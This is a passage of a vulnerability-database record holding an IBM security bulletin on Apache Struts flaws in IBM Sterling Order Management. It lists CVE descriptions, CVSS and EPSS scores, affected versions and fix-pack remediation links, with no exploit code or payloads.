specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary code on the system. \nCVSS Base score: 6.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85573](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85573>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2014-0112](<https://vulners.com/cve/CVE-2014-0112>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to ParametersInterceptor and the failure to restrict access to the class parameter. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92740](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92740>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2134](<https://vulners.com/cve/CVE-2013-2134>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84762](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84762>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2016-3081](<https://vulners.com/cve/CVE-2016-3081>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the passing of a malicious expression when Dynamic Method Invocation is enabled. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 5.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/112528](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112528>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2014-0113](<https://vulners.com/cve/CVE-2014-0113>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to CookieInterceptor and the failure to restrict access to the getClass() method. An attacker could exploit this vulnerability using CookieInterceptor when configured to accept all cookies to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92742](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92742>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2135](<https://vulners.com/cve/CVE-2013-2135>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84763](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84763>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2013-4316](<https://vulners.com/cve/CVE-2013-4316>) \n** DESCRIPTION: **An unspecified error in Apache Struts related to the default enabling of Dynamic Method Invocation (DMI) could lead to remote code execution. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/87373](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87373>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n** CVEID: **[CVE-2012-0391](<https://vulners.com/cve/CVE-2012-0391>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by the interpretation of parameter values as OGNL expressions by the ExceptionDelegator command. An attacker could exploit this vulnerability using a specially-crafted parameter to execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72229](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72229>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2012-0393](<https://vulners.com/cve/CVE-2012-0393>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to traverse directories on the system, caused by the improper validation of input by ParameterInterceptor prior to being used to create files. An attacker could send a specially-crafted URL request containing directory traversal sequences to create or overwrite arbitrary files on the system. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72089](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72089>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-4386](<https://vulners.com/cve/CVE-2012-4386>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site request forgery, caused by improper validation of the token name configuration parameter by the token handling mechanism. By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request to perform unauthorized actions. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/78182](<https://exchange.xforce.ibmcloud.com/vulnerabilities/78182>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2016-4003](<https://vulners.com/cve/CVE-2016-4003>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the URLDecoder implementation. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/111514](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111514>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2016-3093](<https://vulners.com/cve/CVE-2016-3093>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by the improper implementation of cache used to store method references by the OGNL expression language. An attacker could exploit this vulnerability to block access to a Web site. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/113686](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113686>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2013-4310](<https://vulners.com/cve/CVE-2013-4310>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the action: parameter prefix. An attacker could exploit this vulnerability to gain unauthorized access to the system. \nCVSS Base score: 5.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/87336](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87336>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:N) \n \n** CVEID: **[CVE-2014-0116](<https://vulners.com/cve/CVE-2014-0116>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to properly restrict access to the getClass() method by the CookieInterceptor class. An attacker could exploit this vulnerability to manipulate the ClassLoader used by the application server. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/93024](<https://exchange.xforce.ibmcloud.com/vulnerabilities/93024>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2010-1870](<https://vulners.com/cve/CVE-2010-1870>) \n** DESCRIPTION: **XWork, as used in Apache Struts, FishEye and Crucible, could allow a remote attacker to bypass security restrictions, caused by an error in the ParameterInterceptor class. An attacker could exploit this vulnerability using specially-crafted OGNL (Object-Graph Navigation Language) expressions to modify server-side objects and possibly execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/60371](<https://exchange.xforce.ibmcloud.com/vulnerabilities/60371>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2016-3082](<https://vulners.com/cve/CVE-2016-3082>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of XSLTResult to parse arbitrary stylesheet. An attacker could exploit this vulnerability to inject and execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/112527](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112527>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2016-4436](<https://vulners.com/cve/CVE-2016-4436>) \n** DESCRIPTION: **An unspecified error Apache Struts related to the method used to clean up action name has an unknown impact and attack vector. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/114183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2013-2251](<https://vulners.com/cve/CVE-2013-2251>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating the action:, redirect:, and redirectAction: parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary commands on the system. Note: This vulnerability affects other products. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85756](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85756>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2017-12611](<https://vulners.com/cve/CVE-2017-12611>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of an unintentional expression in Freemarker tag instead of string literals. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/131603](<https://exchange.xforce.ibmcloud.com/vulnerabilities/131603>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2015-5209](<https://vulners.com/cve/CVE-2015-5209>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to gain unauthorized access to the system. An attacker could exploit this vulnerability using a special top-level object to manipulate internal settings and modify another user session. \nCVSS Base score: 9.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/106695](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106695>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N) \n \n** CVEID: **[CVE-2013-2115](<https://vulners.com/cve/CVE-2013-2115>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an incomplete fix for an error related to the handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84543](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84543>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-1966](<https://vulners.com/cve/CVE-2013-1966>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restriction, caused by the improper handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject OGNL code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84542](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84542>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2248](<https://vulners.com/cve/CVE-2013-2248>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to conduct phishing attacks, caused by an open redirect vulnerability in the DefaultActionMapper class. An attacker could exploit this vulnerability using the redirect: and redirectAction:: parameters in a specially-crafted URL to redirect a victim to arbitrary Web sites. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85755](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85755>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2015-2992](<https://vulners.com/cve/CVE-2015-2992>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when directly accessing JSP files. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/106172](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106172>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2015-5169](<https://vulners.com/cve/CVE-2015-5169>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when debug mode is enabled. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/105879](<https://exchange.xforce.ibmcloud.com/vulnerabilities/105879>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling Order Management| 10.0 \nIBM Sterling Order Management| 9.5.x \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading to the latest fixpack that has the upgraded version of Apache Struts. Please note the fixpack only applies to IBM Sterling Order Management version 10 and if you are running IBM Sterling Order Management version 9.5 a product upgrade must be completed first. IBM Sterling Order Management version 9.5 end of support April 30, 2022.\n\nOrder Management installing Fix Pack29 -[https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version#fp29 https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version#fp30](<https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version#fp29>)\n\nFix Pack 29 download location - [https://www.ibm.com/support/fixcentral/swg/selectFixes?fixids=10.0.0.0-Sterling-SSFF-All-fp30-Installer&product=ibm%2FOther%20software%2FSterling%20Selling%20and%20Fulfillment%20Foundation&source=dbluesearch&mhsrc=ibmsearch_a&mhq=10.0.0.0-Sterling-SSFF-All-fp30-Installer%20&function=fixId&parent=ibm/Other%20software](<https://www.ibm.com/support/fixcentral/swg/selectFixes?fixids=10.0.0.0-Sterling-SSFF-All-fp30-Installer&product=ibm%2FOther%20software%2FSterling%20Selling%20and%20Fulfillment%20Foundation&source=dbluesearch&mhsrc=ibmsearch_a&mhq=10.0.0.0-Sterling-SSFF-All-fp30-Installer%20&function=fixId&parent=ibm/Other%20software>)\n\nCreating & Extending Struts - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=cesf-creating-extending-struts-xml-file-in-web-ui-framework>\n\nOn-Premise release notes - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version>\n\nFix Central Link (**FP details URL)**: \n[http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR>)\n\n## Workarounds and Mitigations\n\nIBM strongly recommends addressing the vulnerability now by executing above steps in product version 10.0. Version 9.5 is end of support as of April 30, 2022. If you need further clarifications regarding 9.5 end of support, log4j and version 9.5 please contact IBM support.\n\n## ", "published": "2022-09-14T17:45:15", "modified": "2022-09-14T17:45:15", "epss": [{"cve": "CVE-2010-1870", "epss": 0.03864, "percentile": 0.90632, "modified": "2023-06-19"}, {"cve": "CVE-2011-1772", "epss": 0.0043, "percentile": 0.70936, "modified": "2023-06-23"}, {"cve": "CVE-2011-5057", "epss": 0.01033, "percentile": 0.81755, "modified": "2023-06-06"}, {"cve": "CVE-2012-0391", "epss": 0.14646, "percentile": 0.94972, "modified": "2023-06-19"}, {"cve": "CVE-2012-0392", "epss": 0.97059, "percentile": 0.9962, "modified": "2023-06-19"}, {"cve": "CVE-2012-0393", "epss": 0.94317, "percentile": 0.98789, "modified": "2023-06-19"}, {"cve": "CVE-2012-0838", "epss": 0.01889, "percentile": 0.86776, "modified": "2023-06-19"}, {"cve": "CVE-2012-1006", "epss": 0.61374, "percentile": 0.97297, "modified": "2023-06-19"}, {"cve": "CVE-2012-4386", "epss": 0.00268, "percentile": 0.63014, "modified": "2023-06-19"}, {"cve": "CVE-2012-4387", "epss": 0.02305, "percentile": 0.88122, "modified": "2023-06-19"}, {"cve": "CVE-2013-1965", "epss": 0.00813, "percentile": 0.79394, "modified": "2023-06-19"}, {"cve": "CVE-2013-1966", "epss": 0.01858, "percentile": 0.86664, "modified": "2023-06-19"}, {"cve": "CVE-2013-2115", "epss": 0.00595, "percentile": 0.7532, "modified": "2023-06-19"}, {"cve": "CVE-2013-2134", "epss": 0.96946, "percentile": 0.99569, "modified": "2023-06-19"}, {"cve": "CVE-2013-2135", "epss": 0.95739, "percentile": 0.99118, "modified": "2023-06-19"}, {"cve": "CVE-2013-2248", "epss": 0.97324, "percentile": 0.998, "modified": "2023-06-19"}, {"cve": "CVE-2013-2251", "epss": 0.97432, "percentile": 0.99901, "modified": "2023-06-19"}, {"cve": "CVE-2013-4310", "epss": 0.01489, "percentile": 0.84961, "modified": "2023-06-23"}, {"cve": "CVE-2013-4316", "epss": 0.00871, "percentile": 0.80088, "modified": "2023-06-23"}, {"cve": "CVE-2014-0094", "epss": 0.97175, "percentile": 0.99683, "modified": "2023-06-19"}, {"cve": "CVE-2014-0112", "epss": 0.97404, "percentile": 0.99872, "modified": "2023-06-19"}, {"cve": "CVE-2014-0113", "epss": 0.96867, "percentile": 0.99523, "modified": "2023-06-19"}, {"cve": "CVE-2014-0116", "epss": 0.00865, "percentile": 0.80016, "modified": "2023-06-19"}, {"cve": "CVE-2014-7809", "epss": 0.00192, "percentile": 0.55571, "modified": "2023-06-19"}, {"cve": "CVE-2015-2992", "epss": 0.0059, "percentile": 0.75231, "modified": "2023-06-23"}, {"cve": "CVE-2015-5169", "epss": 0.00481, "percentile": 0.72459, "modified": "2023-06-23"}, {"cve": "CVE-2015-5209", "epss": 0.00305, "percentile": 0.65475, "modified": "2023-06-23"}, {"cve": "CVE-2016-3081", "epss": 0.97524, "percentile": 0.99975, "modified": "2023-06-03"}, {"cve": "CVE-2016-3082", "epss": 0.95903, "percentile": 0.99156, "modified": "2023-06-03"}, {"cve": "CVE-2016-3093", "epss": 0.02732, "percentile": 0.89013, "modified": "2023-06-03"}, {"cve": "CVE-2016-4003", "epss": 0.01905, "percentile": 0.8681, "modified": "2023-06-03"}, {"cve": "CVE-2016-4436", "epss": 0.02365, "percentile": 0.88244, "modified": "2023-06-03"}, {"cve": "CVE-2017-12611", "epss": 0.97358, "percentile": 0.99827, "modified": "2023-06-23"}, {"cve": "CVE-2019-0230", "epss": 0.89027, "percentile": 0.98216, "modified": "2023-06-13"}, {"cve": "CVE-2019-0233", "epss": 0.13219, "percentile": 0.9474, "modified": "2023-06-13"}, {"cve": "CVE-2020-17530", "epss": 0.97014, "percentile": 0.99594, "modified": "2023-06-06"}], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.ibm.com/support/pages/node/6620355", "reporter": "IBM", "references": [], "cvelist": ["CVE-2010-1870", "CVE-2011-1772", "CVE-2011-5057", "CVE-2012-0391", "CVE-2012-0392", "CVE-2012-0393", "CVE-2012-0838", "CVE-2012-1006", "CVE-2012-4386", "CVE-2012-4387", "CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2013-2248", "CVE-2013-2251", "CVE-2013-4310", "CVE-2013-4316", "CVE-2014-0094", "CVE-2014-0112", "CVE-2014-0113", "CVE-2014-0116", "CVE-2014-7809", "CVE-2015-2992", "CVE-2015-5169", "CVE-2015-5209", "CVE-2016-3081", "CVE-2016-3082", "CVE-2016-3093", "CVE-2016-4003", "CVE-2016-4436", "CVE-2017-12611", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-17530"], "immutableFields": [], "lastseen": "2023-06-24T05:58:38", "viewCount": 18, "enchantments": {"dependencies": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-60189", "ATLASSIAN:CONFSERVER-60264", "ATLASSIAN:CRUC-8497", "ATLASSIAN:CWD-5688", "ATLASSIAN:FE-7331", "CONFSERVER-60264", "CRUC-8497", "CWD-5688", "FE-7331"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:31890548-3E0B-40EF-84B2-B9CBDC95596A", "AKB:CB02764B-566F-4540-ACA2-C9DDEE8D1496", "AKB:CF76EF1F-CB59-4A29-ADB1-DA37C695142B", "AKB:F287CDB5-FC29-49E2-B958-BAAE1EECEA70"]}, {"type": "canvas", "idList": ["STRUTS2_DEFAULT_ACTION_MAPPER", "STRUTS2_DMI_RCE", "STRUTSCODEINJECTION"]}, {"type": "cert", "idList": ["VU:719225"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2010-141", "CPAI-2012-120", "CPAI-2012-225", "CPAI-2013-1859", "CPAI-2013-2167", "CPAI-2013-2505", "CPAI-2013-2507", "CPAI-2013-2969", "CPAI-2014-1480", "CPAI-2015-0737", "CPAI-2016-0302", "CPAI-2016-0365", "CPAI-2017-0747", "CPAI-2018-0779", "CPAI-2020-1331"]}, {"type": "cisa", "idList": ["CISA:3D9E69A26C68866B64ED6E4B31E270E6", "CISA:84B5063678E22C88DCF150A265C078F7", "CISA:C17258C519A149D638B0BCF35898ABEE"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2012-0391", "CISA-KEV-CVE-2013-2251", "CISA-KEV-CVE-2020-17530"]}, {"type": "cisco", "idList": ["CISCO-SA-20131023-STRUTS2", "CISCO-SA-20140709-STRUTS2", "CISCO-SA-20170909-STRUTS2-RCE"]}, {"type": "cve", "idList": ["CVE-2010-1870", "CVE-2011-1772", "CVE-2011-2088", "CVE-2011-5057", "CVE-2012-0391", "CVE-2012-0392", "CVE-2012-0393", "CVE-2012-0838", "CVE-2012-1006", "CVE-2012-4386", "CVE-2012-4387", "CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2013-2248", "CVE-2013-2251", "CVE-2013-4310", "CVE-2013-4316", "CVE-2014-0094", "CVE-2014-0112", "CVE-2014-0113", "CVE-2014-0116", "CVE-2014-7809", "CVE-2015-2992", "CVE-2015-5169", "CVE-2015-5209", "CVE-2016-0759", "CVE-2016-3081", "CVE-2016-3082", "CVE-2016-3093", "CVE-2016-4003", "CVE-2016-4436", "CVE-2017-12611", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-17530", "CVE-2021-31805"]}, {"type": "d2", "idList": ["D2SEC_STRUTS", "D2SEC_STRUTS2", "D2SEC_STRUTS4"]}, {"type": "dsquare", "idList": ["E-2", "E-30", "E-319", "E-339", "E-340", "E-341", "E-633", "E-665"]}, {"type": "exploitdb", "idList": ["EDB-ID:14360", "EDB-ID:44583", "EDB-ID:48917"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:79276FB192FE217AB9D7D1BAF44AF225", "EXPLOITPACK:C0CFCAABB02FC4AC5D0EF38D381E1E35"]}, {"type": "f5", "idList": ["F5:K10506844", "F5:K13434228", "F5:K15260", "F5:K15261", "F5:K15262", "F5:K17126", "F5:K17449", "F5:K17563", "F5:K17588029", "F5:K20127031", "F5:K23432135", "F5:K24608264", "F5:K34352169", "F5:K45474286", "F5:K93135205", "SOL14933", "SOL15260", "SOL15261", "SOL15262", "SOL16334", "SOL17126", "SOL17449", "SOL17563", "SOL17588029", "SOL23432135"]}, {"type": "gentoo", "idList": ["GLSA-201409-04"]}, {"type": "github", "idList": ["GHSA-265R-PP83-GWW7", "GHSA-2RVH-Q539-Q33V", "GHSA-383P-XQXX-RRMP", "GHSA-3C5C-XRQ4-QHR8", "GHSA-47QP-8V9G-39HP", "GHSA-4QGJ-9MVG-3929", "GHSA-56F8-G68R-J699", "GHSA-737W-MH58-CXJP", "GHSA-7GHM-RPC7-P7G5", "GHSA-8FX9-5HX8-CRHM", "GHSA-CCP5-GG58-PXFM", "GHSA-GQQM-564F-VVXQ", "GHSA-H4V9-JF2R-9H6M", "GHSA-HMHQ-382Q-MP56", "GHSA-HRGC-54MV-58GV", "GHSA-J7H6-XR7G-M2C5", "GHSA-JC35-Q369-45PV", "GHSA-M3X6-9V6H-4G28", "GHSA-MWRX-HX6X-3HHV", "GHSA-PRJV-JJ26-WF8H", "GHSA-PVM9-288C-V5WQ", "GHSA-PW8R-X2QM-3H5M", "GHSA-Q5Q8-JGHF-3PM3", "GHSA-RPJ9-R897-WC6Q", "GHSA-V8J6-6C2R-R27C", "GHSA-VRWC-QJMW-5RJM", "GHSA-VWHV-J36G-5RM8", "GHSA-WHMQ-V94Q-34P9", "GHSA-WP4H-PVGW-5727", "GHSA-X5FC-PGPX-59J5", "GITHUB:0519EA92487B44F364A1B35C85049455"]}, {"type": "githubexploit", "idList": ["2691C74B-4ECB-5E22-8BDF-7784E321BE55", "32FB08A0-ACB0-5E2F-8691-570E7B806086", "3640EAF9-330F-508E-A488-D3A51649AD96", "453574C2-C801-529D-A0A6-5C5E1471F1AC", "4E339DB6-4704-5991-B690-DF8D7307532E", "5E7409E5-7716-5F40-999C-E6622B806F5E", "7247E67F-6DD7-5526-8312-91D0D99FED26", "B1E738E0-BF1B-50E1-88E2-1D265CF9AEB8", "B2E1F725-D74D-5E81-88CC-6530BC9BAB30", 